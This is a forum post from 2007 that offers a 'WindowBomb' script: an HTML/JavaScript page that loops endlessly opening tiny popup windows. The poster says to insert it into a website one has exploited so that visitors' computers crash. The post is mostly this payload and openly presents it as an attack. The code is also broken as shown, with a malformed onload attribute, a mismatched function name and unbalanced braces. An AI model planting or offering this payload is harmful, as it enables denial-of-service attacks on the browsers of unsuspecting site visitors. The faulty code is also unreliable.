Computer Forums

Member Login

Remember Me? Sign Up! | Forgot Password
 
Slogan
 
Closed Thread
Old 08-30-2007, 04:07 PM   #1 (permalink)
Osiris's Avatar
 

Join Date: Jan 2005

Location: Kentucky

Posts: 32,217

Osiris is a jewel in the roughOsiris is a jewel in the roughOsiris is a jewel in the rough

Send a message via ICQ to Osiris Send a message via AIM to Osiris Send a message via MSN to Osiris Send a message via Yahoo to Osiris Send a message via Skype™ to Osiris
Default WindowBomb

If you are able to successfully exploit a website and want to make a computer crash, insert the code:


<HTML>
<HEAD>
<TITLE>WARNING! </TITLE>
</HEAD>
<BODY onload-"windowsbomb()">
<SCRIPT Language = "javascript">
function windowbomb()
{
var icounter=0 // dummy counter
while (true)
{
{window.open("http://www.netscape.com","CRASHING" + icounter,
"width=1, height=1,resizable=no")
icounter++
}
}
</script>
</BODY>
</HTML>

This is a scripting code, with a poor logic design, but put in this way purposely. It will continue opening webpages to this site untill all available resources have been consumed.
__________________
Osiris is offline  
 
Closed Thread

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On